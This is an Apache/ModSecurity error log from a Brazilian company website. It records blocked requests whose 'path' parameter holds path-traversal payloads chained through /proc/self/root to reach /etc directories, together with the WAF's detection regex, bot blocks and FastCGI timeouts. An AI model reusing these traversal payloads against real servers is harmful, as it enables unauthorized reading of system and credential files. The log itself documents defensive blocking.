[Tue Mar 17 18:39:54.090457 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:52936] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKKta6ubjKNq_cu4YiUAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:55.559812 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:52948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKK9Y0UrI5A3LftIwY6gAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:39:57.736726 2026] [:error] [pid 25836:tid 140411616036608] [client 74.7.241.31:50062] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKLYh-PF_25v4hFRCE8gAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:10.129846 2026] [proxy_fcgi:error] [pid 25836:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:48310] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:40:14.807459 2026] [:error] [pid 25836:tid 140411741927168] [client 74.7.241.31:50078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKPoh-PF_25v4hFRCFAAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:16.645132 2026] [:error] [pid 29151:tid 140411666392832] [client 74.7.241.31:57928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKQPPqhzTj3BvfDX-h5wAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:18.802992 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:54700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKQta6ubjKNq_cu4YiWgAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:21.725474 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:54706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKRcU6Sx0TG1YjmQjJFwAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:32.125801 2026] [proxy_fcgi:error] [pid 2598:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48878] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:40:34.952168 2026] [:error] [pid 6296:tid 140411649607424] [client 74.7.228.61:56668] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnKUnIk7brgkOH-rIWnXwAAAUs"]
[Tue Mar 17 18:40:34.959309 2026] [:error] [pid 7004:tid 140411683178240] [client 74.7.241.31:37918] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKUsU6Sx0TG1YjmQjJJwAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:38.241783 2026] [proxy_fcgi:error] [pid 25836:tid 140411641214720] [client 45.80.158.167:51424] AH01071: Got error 'Primary script unknown'
[Tue Mar 17 18:40:38.831490 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.241.31:34410] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKVta6ubjKNq_cu4YiYQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:41.067043 2026] [:error] [pid 6296:tid 140411674785536] [client 74.7.241.31:34422] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKWXIk7brgkOH-rIWnZQAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:42.531403 2026] [:error] [pid 6296:tid 140411574073088] [client 74.7.241.31:34432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKWnIk7brgkOH-rIWnaAAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:40:55.135628 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:49492] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:40:59.203256 2026] [:error] [pid 2473:tid 140411733534464] [client 74.7.244.43:60678] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abnKa6BJNF7axNlVR0UzOwAAAAE"]
[Tue Mar 17 18:41:04.198398 2026] [:error] [pid 7437:tid 140411708356352] [client 74.7.243.128:33936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKcAeiSKl8TjouI-YynQAAA8Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:41:16.301797 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.241.31:34444] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKfOyqAr6etmhZHNpClgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:41:17.154448 2026] [proxy_fcgi:error] [pid 7004:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:50168] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:41:19.989169 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:44554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKfxj0p0SRWAqcjGGUlwAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:41:21.290861 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:44570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKgdY0UrI5A3LftIwZDAAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:41:28.168147 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.31:44572] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKiKBJNF7axNlVR0UzSwAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:41:37.788010 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:43676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKkaBJNF7axNlVR0UzTwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:41:39.137795 2026] [proxy_fcgi:error] [pid 2598:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50860] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:42:02.126821 2026] [proxy_fcgi:error] [pid 25836:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51482] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:42:11.607795 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.241.31:43682] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKstY0UrI5A3LftIwZLQAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:12.942258 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.31:37496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKtBj0p0SRWAqcjGGUsgAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:15.104397 2026] [:error] [pid 6296:tid 140411699963648] [client 74.7.241.31:37508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnKt3Ik7brgkOH-rIWnmgAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:42:24.125831 2026] [proxy_fcgi:error] [pid 7437:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51974] AH01075: Error dispatching request to : (polling)
